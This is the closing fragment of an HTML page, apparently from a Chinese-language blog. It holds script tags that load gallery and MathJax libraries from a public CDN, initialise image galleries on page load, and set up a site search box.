    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script type="text/javascript" id="MathJax-script" async>MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      },
      svg: {
        fontCache: 'global'
      },
      chtml: {
        matchFontHeight: false
      }
    };</script><script src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-mml-chtml.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>